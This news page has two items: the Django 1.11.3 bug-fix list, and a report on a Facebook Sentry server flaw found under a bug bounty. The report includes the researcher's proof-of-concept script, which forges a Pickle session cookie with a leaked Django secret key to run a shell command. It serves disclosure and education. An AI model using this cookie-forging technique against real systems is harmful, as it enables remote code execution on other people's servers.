Django 1.11.3 released

Popular Python framework received new update, which brings cool new features and bugfixes 
05 July 2017   1222
Django

A high-level, free and open source Python Web framework that encourages rapid and clean development with  pragmatic design.
 

Python

Is a multi-paradigm programming language with easy-to-use syntax and many features.

Good news for all Python coders and Django users. It has new 1.11.3 version now.

List of fixed issues

  • Removed an incorrect deprecation warning about a missing renderer argument if a Widget.render() method accepts **kwargs.
  • Fixed a regression causing Model.__init__() to crash if a field has an instance only descriptor.
  • Fixed an incorrect DisallowedModelAdminLookup exception when using a nested reverse relation in list_filter.
  • Fixed admin’s FieldListFilter.get_queryset() crash on invalid input.
  • Fixed invalid HTML for a required AdminFileWidget.
  • Fixed model initialization to set the name of class-based model indexes for models that only inherit models.Model.
  • Fixed crash in admin’s inlines when a model has an inherited non-editable primary key.
  • Fixed QuerySet.union()intersection(), and difference() when combining with an EmptyQuerySet.
  • Prevented Paginator’s unordered object list warning from evaluating a QuerySet.
  • Fixed the value of redirect_field_name in LoginView’s template context. It’s now an empty string (as it is for the original function-based login() view) if the corresponding parameter isn’t sent in a request (in particular, when the login page is accessed directly).
  • Prevented attribute values in the django/forms/widgets/attrs.html template from being localized so that numeric attributes (e.g. max and min) of NumberInput work correctly.
  • Removed casting of the option value to a string in the template context of the CheckboxSelectMultipleNullBooleanSelectRadioSelectSelectMultiple, and Select widgets. In Django 1.11.1, casting was added in Python to avoid localization of numeric values in Django templates, but this made some use cases more difficult. Casting is now done in the template using the |stringformat:'s' filter.
  • Prevented a primary key alteration from adding a foreign key constraint if db_constraint=False.
  • Fixed UnboundLocalError crash in RenameField with nonexistent field.
  • Fixed a regression preventing a model field’s limit_choices_to from being evaluated when a ModelForm is instantiated.

Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   791

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.